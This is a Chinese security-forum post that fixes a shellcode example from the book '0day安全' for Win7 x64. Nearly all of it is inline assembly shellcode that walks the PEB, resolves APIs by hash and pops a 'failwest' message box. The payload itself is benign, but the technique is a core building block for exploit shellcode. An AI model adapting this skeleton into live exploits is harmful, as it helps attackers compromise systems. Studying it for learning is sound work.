首页
社区
课程
招聘
[原创]关于0day安全3.4节在win7下面无法运行的解决方法
发表于: 2022-8-25 00:04 9028

[原创]关于0day安全3.4节在win7下面无法运行的解决方法

2022-8-25 00:04
9028

偶然发现该案例在win10下面可以正常shellcode,在win7 x64下面无法运行,经过对比发现,在win10下kernelbase.dll下有LoadLibraryA函数,而在win7 x64下kernelbase.dll下有LoadLibraryExA,所以对代码进行两部分的修改,hash散列的修改,识别之后对参数的修改,可以对比源码或调试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
int main()
{
 
_asm{
        nop
        nop
 
 
 
        nop
        nop
        nop
        CLD                      ; clear flag DF
        ;store hash
        push 0x1e380a6a        ;hash of MessageBoxA
        push 0x4fd18963        ;hash of ExitProcess
        push 0xc0d83287        ;hash of LoadLibraryExA
        mov esi,esp            ; esi = addr of first function hash
        lea edi,[esi-0xc]    ; edi = addr to start writing function
 
 
 
        ; make some stack space
        xor ebx,ebx
        mov bh, 0x04             
        sub esp, ebx
 
 
 
 
        ; push a pointer to "user32" onto stack
        mov bx, 0x3233         ; rest of ebx is null
        push ebx
        push 0x72657375
        xor edx,edx
        push edx
        push edx
        lea edx,[esp+8]
        push edx
 
        xor edx,edx
 
 
    ; find base addr of kernel32.dll
        mov ebx, fs:[edx + 0x30]     ; ebx = address of PEB
        mov ecx, [ebx + 0x0c]         ; ecx = pointer to loader data
        mov ecx, [ecx + 0x1c]         ; ecx = first entry in initialisation order list
        mov ecx, [ecx]                 ; ecx = second entry in list (kernel32.dll)
        mov ebp, [ecx + 0x08]         ; ebp = base address of kernel32.dll
 
 
    find_lib_functions:
 
        lodsd                     ; load next hash into al and increment esi
        cmp eax, 0x1e380a6a        ; hash of MessageBoxA - trigger
                                ; LoadLibrary("user32")
        jne find_functions
        xchg eax, ebp             ; save current hash
        call [edi - 0x8]         ; LoadLibraryA
        xchg eax, ebp             ; restore current hash, and update ebp
                                ; with base address of user32.dll
 
 
    find_functions:
        pushad                         ; preserve registers
        mov eax, [ebp + 0x3c]        ; eax = start of PE header
        mov ecx, [ebp + eax + 0x78]    ; ecx = relative offset of export table
        add ecx, ebp                 ; ecx = absolute addr of export table
        mov ebx, [ecx + 0x20]         ; ebx = relative offset of names table
        add ebx, ebp                 ; ebx = absolute addr of names table
        xor edi, edi                 ; edi will count through the functions
 
    next_function_loop:
        inc edi                     ; increment function counter
        mov esi, [ebx + edi * 4]     ; esi = relative offset of current function name
        add esi, ebp                 ; esi = absolute addr of current function name
        cdq                         ; dl will hold hash (we know eax is small)
 
    hash_loop:
        movsx eax, byte ptr[esi]
        cmp al,ah
        jz compare_hash
        ror edx,7
        add edx,eax
        inc esi
        jmp hash_loop
 
    compare_hash:   
        cmp edx, [esp + 0x1c]         ; compare to the requested hash (saved on stack from pushad)
        jnz next_function_loop
 
 
        mov ebx, [ecx + 0x24]         ; ebx = relative offset of ordinals table
        add ebx, ebp                 ; ebx = absolute addr of ordinals table
        mov di, [ebx + 2 * edi]     ; di = ordinal number of matched function
        mov ebx, [ecx + 0x1c]         ; ebx = relative offset of address table
        add ebx, ebp                 ; ebx = absolute addr of address table
        add ebp, [ebx + 4 * edi]     ; add to ebp (base addr of module) the
                                    ; relative offset of matched function
        xchg eax, ebp                 ; move func addr into eax
        pop edi                     ; edi is last onto stack in pushad
        stosd                         ; write function addr to [edi] and increment edi
        push edi
        popad                    ; restore registers
                                 ; loop until we reach end of last hash
        cmp eax,0x1e380a6a
        jne find_lib_functions
 
    function_call:
        xor ebx,ebx
        push ebx            // cut string
        push 0x74736577
        push 0x6C696166        //push failwest
        mov eax,esp            //load address of failwest
        push ebx   
        push eax
        push eax
        push ebx
        call [edi - 0x04] ; //call MessageboxA
        push ebx
        call [edi - 0x08] ; // call ExitProcess
        nop
        nop
        nop
        nop
}
}

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//